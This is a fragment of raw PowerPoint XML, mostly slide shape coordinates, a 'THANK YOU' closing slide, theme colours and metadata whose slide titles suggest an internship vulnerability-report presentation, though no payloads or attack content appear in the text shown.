              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 721237 w 1596604"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 728583 w 1596604"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 727879 w 1596604"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 731322 w 1596604"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 752752 w 1596604"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 735278 w 1596604"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 710686 w 1596604"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 696161 w 1596604"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 671335 w 1596604"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 628615 w 1596604"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 562867 w 1596604"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 533684 w 1596604"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 537754 w 1596604"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 505585 w 1596604"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 495472 w 1596604"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 479689 w 1596604"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 477147 w 1596604"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 478140 w 1596604"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 451124 w 1596604"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 427681 w 1596604"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 381480 w 1596604"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 352917 w 1596604"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 333712 w 1596604"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 339534 w 1596604"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 333926 w 1596604"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 339799 w 1596604"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 321387 w 1596604"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 310123 w 1596604"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 306444 w 1596604"/>
              <a:gd name="connsiteY66" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 266582 w 1596604"/>
              <a:gd name="connsiteY67" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 193734 w 1596604"/>
              <a:gd name="connsiteY68" fmla="*/ 604703 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 157169 w 1596604"/>
              <a:gd name="connsiteY69" fmla="*/ 479957 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 83085 w 1596604"/>
              <a:gd name="connsiteY70" fmla="*/ 232564 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 21820 w 1596604"/>
              <a:gd name="connsiteY71" fmla="*/ 79063 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY7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596604" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1596604" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1596604" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333298" y="6857735"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="347555" y="6839114"/>
                  <a:pt x="374580" y="6806441"/>
                  <a:pt x="369891" y="6776847"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="380610" y="6767643"/>
                  <a:pt x="388566" y="6753187"/>
                  <a:pt x="381391" y="6737706"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="387431" y="6708183"/>
                  <a:pt x="395812" y="6708238"/>
                  <a:pt x="398798" y="6686827"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="398911" y="6684856"/>
                  <a:pt x="410263" y="6635748"/>
                  <a:pt x="410376" y="6633777"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="436668" y="6560846"/>
                  <a:pt x="466427" y="6530190"/>
                  <a:pt x="483219" y="6492130"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="484502" y="6486906"/>
                  <a:pt x="495591" y="6432771"/>
                  <a:pt x="498906" y="6431610"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="504661" y="6398644"/>
                  <a:pt x="516644" y="6327702"/>
                  <a:pt x="517746" y="6294334"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="516805" y="6280685"/>
                  <a:pt x="507559" y="6244334"/>
                  <a:pt x="505520" y="6231403"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="498178" y="6202459"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="496958" y="6196814"/>
                  <a:pt x="500278" y="6158095"/>
                  <a:pt x="496976" y="6153037"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="517595" y="5948729"/>
                  <a:pt x="498304" y="5978666"/>
                  <a:pt x="504561" y="5905303"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="510818" y="5831940"/>
                  <a:pt x="525091" y="5774445"/>
                  <a:pt x="534519" y="5712857"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="542444" y="5688518"/>
                  <a:pt x="560422" y="5675288"/>
                  <a:pt x="564317" y="5660491"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="577968" y="5622696"/>
                  <a:pt x="582039" y="5586262"/>
                  <a:pt x="578329" y="5553910"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="572820" y="5528136"/>
                  <a:pt x="593801" y="5491134"/>
                  <a:pt x="602760" y="5449031"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="634978" y="5399411"/>
                  <a:pt x="627099" y="5372719"/>
                  <a:pt x="639643" y="5341916"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="650333" y="5319908"/>
                  <a:pt x="667062" y="5282101"/>
                  <a:pt x="678024" y="5264214"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="687077" y="5246757"/>
                  <a:pt x="679319" y="5238662"/>
                  <a:pt x="684183" y="5225268"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="692465" y="5159961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="696075" y="5125185"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="698988" y="5109833"/>
                  <a:pt x="707175" y="5078571"/>
                  <a:pt x="709941" y="5067850"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="712672" y="5060861"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="712091" y="5038251"/>
                  <a:pt x="711511" y="5015640"/>
                  <a:pt x="710930" y="4993030"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="717839" y="4946844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="729098" y="4858827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735001" y="4821170"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="754327" y="4637396"/>
                  <a:pt x="734543" y="4663172"/>
                  <a:pt x="734314" y="4584173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="719947" y="4510155"/>
                  <a:pt x="730579" y="4436896"/>
                  <a:pt x="725962" y="4375228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="723612" y="4334791"/>
                  <a:pt x="712780" y="4270639"/>
                  <a:pt x="706615" y="4214165"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="697483" y="4170832"/>
                  <a:pt x="710022" y="4106036"/>
                  <a:pt x="708244" y="4076008"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="695944" y="4033999"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="695852" y="4027317"/>
                  <a:pt x="695761" y="4020635"/>
                  <a:pt x="695669" y="4013953"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="699968" y="3872886"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="704580" y="3854851"/>
                  <a:pt x="706671" y="3829756"/>
                  <a:pt x="710341" y="3813873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="715923" y="3786643"/>
                  <a:pt x="718197" y="3761495"/>
                  <a:pt x="721237" y="3738082"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="708606" y="3716230"/>
                  <a:pt x="724800" y="3707883"/>
                  <a:pt x="728583" y="3673397"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="734356" y="3659407"/>
                  <a:pt x="720303" y="3649813"/>
                  <a:pt x="727879" y="3637109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="721013" y="3605834"/>
                  <a:pt x="730751" y="3573837"/>
                  <a:pt x="731322" y="3536883"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="730579" y="3353802"/>
                  <a:pt x="752093" y="3358911"/>
                  <a:pt x="752752" y="3295862"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="752155" y="3249684"/>
                  <a:pt x="742289" y="3189169"/>
                  <a:pt x="735278" y="3158586"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="710686" y="3112365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="696161" y="3072935"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="709099" y="3016612"/>
                  <a:pt x="679177" y="3011906"/>
                  <a:pt x="671335" y="2958185"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="655659" y="2895670"/>
                  <a:pt x="649468" y="2913847"/>
                  <a:pt x="628615" y="2843952"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="587356" y="2799104"/>
                  <a:pt x="590061" y="2611979"/>
                  <a:pt x="562867" y="2554718"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="549490" y="2502065"/>
                  <a:pt x="540721" y="2468551"/>
                  <a:pt x="533684" y="2447068"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="534357" y="2440064"/>
                  <a:pt x="535797" y="2430607"/>
                  <a:pt x="537754" y="2423438"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="529476" y="2329118"/>
                  <a:pt x="516308" y="2315759"/>
                  <a:pt x="505585" y="2261920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="496675" y="2250852"/>
                  <a:pt x="488593" y="2208397"/>
                  <a:pt x="495472" y="2195378"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="494783" y="2185499"/>
                  <a:pt x="470939" y="2164596"/>
                  <a:pt x="479689" y="2155135"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="489660" y="2141929"/>
                  <a:pt x="461592" y="2121310"/>
                  <a:pt x="477147" y="2118008"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="482123" y="2086447"/>
                  <a:pt x="477559" y="2072196"/>
                  <a:pt x="478140" y="2050531"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="473803" y="2015255"/>
                  <a:pt x="459534" y="1937852"/>
                  <a:pt x="451124" y="1906352"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="444080" y="1889396"/>
                  <a:pt x="436393" y="1891128"/>
                  <a:pt x="427681" y="1861531"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="384942" y="1820122"/>
                  <a:pt x="399383" y="1775736"/>
                  <a:pt x="381480" y="1732919"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="361686" y="1665766"/>
                  <a:pt x="360878" y="1643984"/>
                  <a:pt x="352917" y="1615777"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="345510" y="1591298"/>
                  <a:pt x="340636" y="1582061"/>
                  <a:pt x="333712" y="1563678"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="331482" y="1540714"/>
                  <a:pt x="340883" y="1509646"/>
                  <a:pt x="339534" y="1477995"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="346903" y="1404274"/>
                  <a:pt x="333882" y="1358704"/>
                  <a:pt x="333926" y="1307086"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="343622" y="1258551"/>
                  <a:pt x="330328" y="1217137"/>
                  <a:pt x="339799" y="1168288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="337709" y="1131854"/>
                  <a:pt x="326333" y="1113848"/>
                  <a:pt x="321387" y="1088484"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="310123" y="1016103"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="307633" y="984189"/>
                  <a:pt x="313701" y="947732"/>
                  <a:pt x="306444" y="896999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="279390" y="830415"/>
                  <a:pt x="273741" y="757986"/>
                  <a:pt x="266582" y="711705"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="193734" y="604703"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="193628" y="597458"/>
                  <a:pt x="157275" y="487202"/>
                  <a:pt x="157169" y="479957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="164585" y="429578"/>
                  <a:pt x="66362" y="357572"/>
                  <a:pt x="83085" y="232564"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71208" y="154789"/>
                  <a:pt x="31733" y="159605"/>
                  <a:pt x="21820" y="79063"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:tile tx="0" ty="0" sx="70000" sy="7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74DAF-4142-4514-89EE-CE30AE03A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50722" y="1151222"/>
            <a:ext cx="7314826" cy="206870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dirty="0"/>
              <a:t>THANK YOU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48271-3EC2-4C5F-8A83-1A6D2792B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424" y="3218777"/>
            <a:ext cx="5142155" cy="7920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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cooper Black"/>
              </a:rPr>
              <a:t>INTERNSHIPSTUDIO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1300475291"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="AfterhoursVTI">
  <a:themeElements>
    <a:clrScheme name="AnalogousFromDarkSeedLeftStep">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="1C2732"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F1F3F0"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="A14DC3"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="613FB3"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="4D5BC3"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="3B7BB1"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="4BBABF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="3BB185"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="3A96AE"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="7F7F7F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hoursVTI" id="{90A150B1-9C08-42C7-B4E0-C1D732064FA1}" vid="{A6104589-8A83-4A64-B7F1-AAF946A405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AfterhoursVTI</vt:lpstr>
      <vt:lpstr>REPORT ON VULNERABILITY</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>NETSPARKER REPORT (1): </vt:lpstr>
      <vt:lpstr>NETSPARKER REPORT (2):</vt:lpstr>
      <vt:lpstr>DIFFERENT PAYLOADS FOR XSS:</vt:lpstr>
      <vt:lpstr>VULNERABILITY REPORT:</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>POC: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</dc:title>
  <dc:creator/>
  <cp:lastModifiedBy/>
  <cp:revision>242</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-01T16:46:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-02T09:25:49Z</dcterms:modified>
</cp:coreProperties>
</file>